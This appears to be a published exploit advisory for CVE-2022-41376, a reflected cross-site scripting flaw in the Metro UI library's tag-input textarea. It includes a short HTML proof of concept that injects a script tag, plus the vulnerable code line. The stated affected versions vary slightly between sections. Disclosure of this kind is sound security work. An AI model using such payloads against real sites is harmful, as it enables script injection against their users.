Headline
CVE-2022-41376: Metro UI v4.4.0 Components Library Reflected XSS Injection
Metro UI v4.4.0 to v4.5.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Javascript function.
2022-09-23 18:38:30 alicangonullu 51 saniye 32 PDF
# Exploit Title: Metro UI v4.4.0 Components Library Reflected XSS Injection
# Date: 09-19-2022
# Exploit Author: Ali Can Gonullu / Defans Security, Turkey
# Vendor Homepage: https://metroui.org.ua/intro.html
# Software Link: https://metroui.org.ua/intro.html
# Version: v4.4.0-v4.5.x (REQUIRED)
# Tested on: Windows 10 x64
# Video : https://youtu.be/_wzGVpX54Rc
PoC :
<head>
<title>Exploit PoC</title>
<link rel="stylesheet" href="https://cdn.korzh.com/metroui/v4.5.1/css/metro-all.min.css">
<script src="https://cdn.korzh.com/metroui/v4.5.1/js/metro.min.js"></script>
</head>
<body>
<textarea data-role="taginput" name="kuralicerik" cols="60" rows="10"><script>alert(0)</script>,</textarea>
</body>
Write exploit code to textarea and touch to comma button
That textarea triggering to a javascript code
Vulnerable code : container = $("<div>").addClass("tag-input " + element[0].className).addClass(o.clsComponent).insertBefore(element);
element.appendTo(container);Related news
Metro UI v4.4.0 to v4.5.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Javascript function. User input is not properly sanitized before rendering in the `textarea` component.